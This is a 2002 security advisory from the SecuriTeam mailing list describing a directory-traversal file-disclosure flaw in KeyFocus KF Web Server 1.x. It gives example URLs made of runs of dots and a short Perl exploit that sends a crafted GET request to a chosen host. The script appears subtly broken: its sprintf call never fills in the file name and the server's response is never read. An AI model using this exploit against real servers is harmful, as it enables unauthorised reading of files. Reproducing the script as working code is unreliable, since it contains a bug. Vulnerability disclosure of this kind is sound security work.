[NT] KeyFocus KF Web Server File Disclosure Vulnerability

From: support@securiteam.com
Date: 11/14/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 14 Nov 2002 15:01:26 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -

  KeyFocus KF Web Server File Disclosure Vulnerability
------------------------------------------------------------------------

SUMMARY

 <http://www.keyfocus.net/kfws/> KeyFocus Web server is a Win32 HTTP
server with web administration, a variety of logging formats, such as NCSA
and W3C, CGI, compression, memory caching of static documents, directory
indexing, pre-defined MIME settings, internal authentication with support
for multiple realms, and a variety of URL checks that make it more secure
against hacking attempts such as buffer overruns.

DETAILS

Vulnerable systems:
 * KFWS version 1.x

Immune systems:
 * KFWS version 2.0.0

KFWS contains a flaw that enables attackers to traverse above the webroot
in the directory structure. This is not a traditional directory traversal
attack. KFWS does not properly handle consecutive dot characters in the
file name:

http://kfws/. - Current Directory
http://kfws/.. - 403 Forbidden
http://kfws/... - KFWS install dir (OOPS!)
http://kfws/.... - Program Files
http://kfws/..... - \

This vulnerability is limited by the internal hack defenses of the server
-- only files with recognized MIME types can be retreived. This
significantly limits the damage from this vulnerability.

Solution:
KFWS v2.0.0 (Beta) eliminates this vulnerability, and the next stable
version will eliminate the flaw as well. Administrators who are concerned
about this flaw should upgrade to the beta.

Exploit:
#!/usr/bin/perl
use URI::Escape;
use IO::Socket;
if (@ARGV < 2) {
print STDOUT "Usage: perl $0 [filename] [host] [port]";
} else {
$f =
IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp");
$url = uri_escape($ARGV[0]);
$exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n");
print $f $exploit;
undef $f;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:mattmurphy@kc.rr.com> Matt
Murphy.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.